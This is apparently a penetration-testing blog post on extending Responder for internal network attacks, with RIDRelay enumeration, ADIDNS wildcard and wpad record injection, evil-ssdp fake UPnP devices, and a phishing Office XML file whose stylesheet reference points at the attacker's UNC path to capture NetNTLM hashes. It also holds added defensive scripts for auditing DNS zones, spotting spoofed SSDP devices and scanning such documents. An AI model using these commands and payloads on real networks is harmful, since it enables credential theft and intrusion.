A blog about generally interesting infosec stuff by employees of SecQuest Information Security https://www.secquest.co.uk

Thursday, 27 September 2018

From Advanced Responder to Practical Usage - Practical Applications

In the previous two articles in this series we covered various ideas and theories on how to expand and utilise the entire Responder suite. This article is going to focus on expanding the suite further with a focus on practical usages for your penetration tests. If you have not already read the previous two articles in the series, you can find them on this website. I strongly advise that you read these two articles before this one, as this article assumes the knowledge contained within them.

Practical Applications – Identifying Targets

The primary difficulty with using MultiRelay is identifying admin users and capturing their hashes. Whilst you can specify an "ALL" parameter within MultiRelay, if you are using the following techniques effectively this will likely create a lot of failed login attempt noise on the network. The tool RIDRelay, created by skorov, allows us to enumerate all users on a domain by RID cycling over a relayed (passed) hash. This tool can help us find admin users and other targets, and no privileges are required.

To execute this attack successfully you merely need to start the tool using ridrelay.py -t <target>, where the target parameter is a host on the domain. You can also use the -o parameter to output enumerated usernames to a file.

Example command: python ridrelay.py -t -o output.txt
The final step in the process is to get a user on the domain to connect to the SMB server within RIDRelay. To do this you can use any of the methods mentioned in the previous articles or one of the methods introduced below. Make sure that you turn off the SMB server in Responder temporarily if you started Responder before RIDRelay, or it will fail to bind to the necessary ports.
The download for this tool can be found on its GitHub page here: https://github.com/skorov/ridrelay
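To make the RID-cycling output easier to read, here is an added example (written for this article, not code from RIDRelay or Responder) that parses Windows SIDs, splits off the RID, converts between the string and wire formats, and names the well-known RIDs (500, 512, 519 and so on) that mark the admin accounts and groups the paragraph above is looking for. The SID layout and well-known RID values are Microsoft-documented; the domain SID used in the usage section is constructed.

```python
"""Parse Windows security identifiers (SIDs), split off the RID and
classify well-known RIDs so that RID-cycling results can be read.

Added example for this article; it is not part of RIDRelay or Responder.
The SID layout and well-known RID values are Microsoft-documented."""
import struct

# Well-known domain RIDs (fixed values, documented by Microsoft)
WELL_KNOWN_RIDS = {
    500: "Administrator",
    501: "Guest",
    502: "krbtgt",
    512: "Domain Admins",
    513: "Domain Users",
    516: "Domain Controllers",
    518: "Schema Admins",
    519: "Enterprise Admins",
}


def parse_sid(sid):
    """Split 'S-1-5-21-a-b-c-1105' into (revision, authority, [subauthorities])."""
    parts = sid.split("-")
    if len(parts) < 4 or parts[0] != "S" or parts[1] != "1":
        raise ValueError("not a SID: %r" % sid)
    return 1, int(parts[2]), [int(p) for p in parts[3:]]


def domain_sid(sid):
    """Return the domain part of an account SID (everything before the RID)."""
    _, authority, subs = parse_sid(sid)
    # Domain account SIDs look like S-1-5-21-X-Y-Z-RID: five subauthorities
    if authority != 5 or len(subs) < 5 or subs[0] != 21:
        raise ValueError("not a domain account SID: %r" % sid)
    return "S-1-5-21-" + "-".join(str(s) for s in subs[1:-1])


def rid_of(sid):
    """The last subauthority is the relative identifier (RID)."""
    return parse_sid(sid)[2][-1]


def classify(sid):
    """Name well-known RIDs; RIDs >= 1000 are accounts/groups created in the domain."""
    rid = rid_of(sid)
    if rid in WELL_KNOWN_RIDS:
        return WELL_KNOWN_RIDS[rid]
    if rid < 1000:
        return "other built-in RID"
    return "domain-created account or group"


def candidate_sids(domain, rids):
    """The SIDs a RID cycle over `rids` asks the domain to resolve to names."""
    return ["%s-%d" % (domain, r) for r in rids]


def sid_to_binary(sid):
    """Encode as the wire-format SID structure: revision byte, subauthority
    count byte, 48-bit big-endian identifier authority, then little-endian
    32-bit subauthorities."""
    rev, authority, subs = parse_sid(sid)
    return (struct.pack("BB", rev, len(subs))
            + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def binary_to_sid(data):
    """Inverse of sid_to_binary."""
    rev, count = struct.unpack_from("BB", data, 0)
    authority = int.from_bytes(data[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, data, 8)
    return "S-%d-%d-%s" % (rev, authority, "-".join(str(s) for s in subs))


if __name__ == "__main__":
    # Constructed sample: a made-up domain SID and a handful of RIDs
    dom = "S-1-5-21-1111-2222-3333"
    for s in candidate_sids(dom, [500, 512, 1105]):
        print(s, "->", classify(s))
```

Any RID below 1000 is a built-in account or group, so a resolved SID ending in 500 or 512 is the kind of result worth prioritising; RIDs from 1000 upwards are allocated to objects created after the domain was built.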

Practical Applications – ADIDNS

Since this method's history and technical background are so beautifully explained in this article: https://blog.netspi.com/exploiting-adidns/, we will only cover the basic practical usage of the tool. If you want to learn how this tool works and its history, please go and read the aforementioned article.
By manipulating dynamic DNS updates we are able to insert DNS records into ADIDNS if the default secure dynamic updates setting is enabled. Using the tool linked below you can insert various records using the following commands:

Run this first:
Import-Module $PWD\Invoke-DNSUpdate.ps1
Import-Module $PWD\Powermad.ps1
Invoke-DNSUpdate -DNSType <type> -DNSName <subdomain/FQDN> -DNSData <destination>
Example: Invoke-DNSUpdate -DNSType A -DNSName smb.domain.local -DNSData

By inserting a new A record into ADIDNS we could re-route traffic from a major SMB server on the network to our own Responder server. It is also possible to add a wildcard record which will resolve as a fallback option for all DNS queries that do not exist within the DNS zone. This acts much like LLMNR/NBNS spoofing but may be available when they are not. You can also exploit WPAD through Responder even when LLMNR or wildcard additions are not available by adding a wpad record to the DNS zone.
New-ADIDNSNode -Node *
There are some limitations to what records you can and cannot add, discussed in the article above; in essence, you will be unable to edit existing DNS records but are able to add new ones.
The download for this tool can be found on its GitHub page here: https://github.com/Kevin-Robertson/Powermad
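From the defending side, the records this section adds (a wildcard node, a wpad node, an A record steering an SMB name elsewhere) are all visible in the zone itself. The following is an added example for this article, not code from Powermad or Responder: it audits an exported zone for exactly those patterns. It assumes the records were already exported (for instance with Get-DnsServerResourceRecord) into (name, type, data) tuples and that the organisation's internal address ranges are known; the sample zone is constructed. The wpad/isatap block-list behaviour it refers to is the Windows DNS Global Query Block List, which is enabled by default.

```python
"""Audit an export of an AD-integrated DNS zone for the kinds of record
this article shows being added (a wildcard node and a wpad node) and for
A/AAAA records that point outside the organisation's own address space.

Added example for this article; it is not part of Powermad or Responder.
It assumes the records were already exported (for instance with
Get-DnsServerResourceRecord) into (name, type, data) tuples; the sample
zone below is constructed."""
import ipaddress

# Names that a Windows DNS server refuses to answer for by default through
# its Global Query Block List (GQBL). A record with one of these names in
# the zone is only harmless while that list stays enabled.
GQBL_DEFAULT = frozenset({"wpad", "isatap"})


def audit_records(records, internal_nets, gqbl=GQBL_DEFAULT):
    """Return a list of (name, type, data, reason) findings."""
    nets = [ipaddress.ip_network(n) for n in internal_nets]
    findings = []
    for name, rtype, data in records:
        node = name.lower()
        if node == "*":
            findings.append((name, rtype, data,
                             "wildcard node: answers every name that does not exist in the zone"))
        if node in gqbl:
            findings.append((name, rtype, data,
                             "name on the Global Query Block List: confirm the block list is still enabled"))
        if rtype in ("A", "AAAA"):
            try:
                addr = ipaddress.ip_address(data)
            except ValueError:
                findings.append((name, rtype, data, "malformed address"))
                continue
            if not any(addr in net for net in nets):
                findings.append((name, rtype, data, "address outside internal ranges"))
    return findings


# Constructed sample export: two ordinary hosts plus the three record
# shapes worth a second look.
SAMPLE_ZONE = [
    ("dc01", "A", "10.0.0.10"),
    ("fileserver", "A", "10.0.0.20"),
    ("*", "A", "10.0.0.99"),
    ("wpad", "A", "10.0.0.99"),
    ("smb", "A", "203.0.113.5"),
]

if __name__ == "__main__":
    for finding in audit_records(SAMPLE_ZONE, ["10.0.0.0/8"]):
        print(finding)
```

Because the article notes that existing records cannot be edited, only new ones added, comparing two exports taken a day apart and running the new records through this audit is a cheap way to spot an added node.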

Practical Applications – SSDP

Another excellent tool which can help you exploit a Windows network is evil-ssdp. This tool creates a fake UPnP device using SSDP spoofing which will appear in users' Windows Explorer windows. When a user clicks on one of these fake UPnP devices, they can be redirected to malicious web pages which will allow you to grab their NetNTLM hash. As an interesting secondary capability, the tool is also capable of identifying XML related vulnerabilities in various applications.
Evil-ssdp can be executed by running the following:
essdp.py <interface> -t <template file>
Example: essdp.py eth0 -t Microsoft-azure
After running this command Windows devices on your local network will begin to detect your fake UPnP device and will display it to users. If the users click on this device, evil-ssdp will attempt to make an SMB connection back to your attacking machine. To intercept this and grab hashes or execute a hash passing attack make sure you are running Responder as discussed in previous articles. This will only work on old browsers that still support the file:// scheme. The phishing functionality, which is shown below, works in all browsers.

If you wish to maximise the effectiveness of this tool, I highly recommend creating your own template file to mimic the environment a user would normally see when visiting an internal website. A section on creating your own templates can be found towards the bottom of the Gitlab page, which can be found here: https://gitlab.com/initstring/evil-ssdp
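A spoofed UPnP device announces itself with the same SSDP NOTIFY datagrams a real one uses, so its presence on a segment can be checked for. The block below is an added example for this article, not code from evil-ssdp or Responder: it parses SSDP advertisements (NOTIFY datagrams and M-SEARCH responses) and flags any whose LOCATION header, the device-description URL that Explorer follows, is served from a host not on an approved list. The multicast group and port are the UPnP standard values; the sample datagram and the approved hosts are constructed.

```python
"""Parse SSDP advertisements (NOTIFY datagrams and M-SEARCH responses)
and flag devices whose description URL is served by a host that is not
on an approved list, which is how a spoofed UPnP device would show up.

Added example for this article; it is not part of evil-ssdp or Responder.
The sample datagram below is constructed."""
import socket
from urllib.parse import urlsplit

SSDP_GROUP = "239.255.255.250"   # SSDP multicast group (UPnP standard)
SSDP_PORT = 1900


def parse_ssdp(datagram):
    """Return (start line, header dict with upper-cased names)."""
    text = datagram.decode("latin-1")
    head = text.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().upper()] = value.strip()
    return lines[0], headers


def check_advert(datagram, approved_hosts):
    """None for non-advertisements, 'ok' for approved, otherwise a reason."""
    start, headers = parse_ssdp(datagram)
    if not (start.startswith("NOTIFY") or start.startswith("HTTP/1.1 200")):
        return None          # M-SEARCH queries and anything else are ignored
    location = headers.get("LOCATION")
    if not location:
        return "advertisement without LOCATION header"
    host = urlsplit(location).hostname
    if host not in approved_hosts:
        return "device description served from unapproved host %s" % host
    return "ok"


# Constructed sample advertisement (addresses from the documentation range)
SAMPLE_ADVERT = (
    b"NOTIFY * HTTP/1.1\r\n"
    b"HOST: 239.255.255.250:1900\r\n"
    b"NT: upnp:rootdevice\r\n"
    b"NTS: ssdp:alive\r\n"
    b"LOCATION: http://192.0.2.50:8888/ssdp/device-desc.xml\r\n"
    b"USN: uuid:constructed-example::upnp:rootdevice\r\n\r\n"
)


def listen(approved_hosts):
    """Join the SSDP group and report every advertisement seen on the LAN."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(("", SSDP_PORT))
    mreq = socket.inet_aton(SSDP_GROUP) + socket.inet_aton("0.0.0.0")
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
    while True:
        data, (src, _) = sock.recvfrom(65535)
        verdict = check_advert(data, approved_hosts)
        if verdict:
            print(src, verdict)


if __name__ == "__main__":
    print(check_advert(SAMPLE_ADVERT, {"192.0.2.10"}))
```

Running listen() with the set of hosts that legitimately publish device descriptions (printers, media servers) turns every unexpected advertisement into a log line with its source address, which is the same address the fake device's web page will be served from.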

Practical Applications – XML Office Files

This attack method can be used very effectively in an email phishing campaign against a domain, especially when targeted at admin users identified by RIDRelay. To create an XML file which will send the reader's hash to your Responder instance create the following XML file in a text editor:

<?xml version="1.0" encoding="utf-8" ?>
<?mso-application progid="Word.Document"?>
<?xml-stylesheet type="text/xsl" href="\\<Your Responder IP>\directory\file.xsl"?>

If you wish to add content to the Word document to make it look legitimate, you can first generate the document in Word and save it as an XML file via the Save As menu. After doing this, you can insert the third line of the XML code above at the top of your XML file. This method can be executed with multiple types of Office document, including Excel spreadsheets. When your victim opens this file they will be prompted to select an Office application to open it with if they have not opened an Office XML file before. If the target domain/host has a text editor assigned to read XML files by default, this attack is unlikely to work.
For further information on this attack, I highly recommend reading the article linked above.
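The tell-tale of this document is the xml-stylesheet processing instruction whose href points at a UNC path, so a mail gateway or endpoint scanner can pick it out before anyone opens it. The following is an added example for this article, not code from Responder or any project the article mentions: it extracts every xml-stylesheet href from an XML document and classifies it as a UNC path, a remote URL, or a local reference. The sample document is constructed from the three-line skeleton above, with a documentation-range address standing in for the Responder IP.

```python
"""Scan an Office XML document for xml-stylesheet processing instructions
whose href points at a UNC path or a remote host, the pattern this
article shows. Added example; the sample document below is constructed."""
import re
from urllib.parse import urlsplit

# Processing instructions are not exposed by xml.etree's default parser,
# so match the prolog text directly.
PI_RE = re.compile(r"<\?xml-stylesheet\s+(.*?)\?>", re.S | re.I)
ATTR_RE = re.compile(r"(\w+)\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s?]+))")


def stylesheet_hrefs(xml_text):
    """Every href given in an xml-stylesheet PI, in document order."""
    hrefs = []
    for match in PI_RE.finditer(xml_text):
        attrs = {}
        for name, dq, sq, bare in ATTR_RE.findall(match.group(1)):
            attrs[name.lower()] = dq or sq or bare
        if "href" in attrs:
            hrefs.append(attrs["href"])
    return hrefs


def classify_href(href):
    """'unc' for \\\\host\\share paths, 'remote' for URLs with a host, else 'local'."""
    h = href.strip()
    if h.startswith("\\\\") or h.startswith("//"):
        return "unc"      # Office fetches this over SMB and authenticates to the host
    parts = urlsplit(h)
    if parts.scheme in ("http", "https", "file") and parts.netloc:
        return "remote"
    return "local"


def scan_document(xml_text):
    """Return [(href, kind)] for every stylesheet reference that leaves the host."""
    return [(h, classify_href(h)) for h in stylesheet_hrefs(xml_text)
            if classify_href(h) != "local"]


# Constructed sample: the article's skeleton with a placeholder Responder
# address from the documentation range (203.0.113.0/24).
SAMPLE_DOC = (
    '<?xml version="1.0" encoding="utf-8" ?>\n'
    '<?mso-application progid="Word.Document"?>\n'
    '<?xml-stylesheet type="text/xsl" href="\\\\203.0.113.9\\share\\file.xsl"?>\n'
    '<w:wordDocument xmlns:w="urn:constructed-example"/>\n'
)

# A benign document for comparison: stylesheet shipped alongside the file
BENIGN_DOC = (
    '<?xml version="1.0"?>\n'
    '<?xml-stylesheet type="text/xsl" href="styles.xsl"?>\n'
    '<root/>\n'
)

if __name__ == "__main__":
    print(scan_document(SAMPLE_DOC))
    print(scan_document(BENIGN_DOC))
```

Any href returned by scan_document is a document that will make the opening host reach out to another machine before the user sees a single page, which is exactly the behaviour the attack depends on; blocking outbound SMB at the perimeter removes the hash-capture path for the UNC case even where the document gets through.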


Thank you for reading my practical guide to Responder, which builds upon my previous two guides for Intermediate and Advanced usage of the tool. If I find more ways to utilise the Responder suite in the future, I will issue another article discussing them. Responder is an extremely flexible tool, not just a niche attack for LLMNR/NBNS spoofing; as such, I highly recommend you seek out your own methods to expand your suite as well.

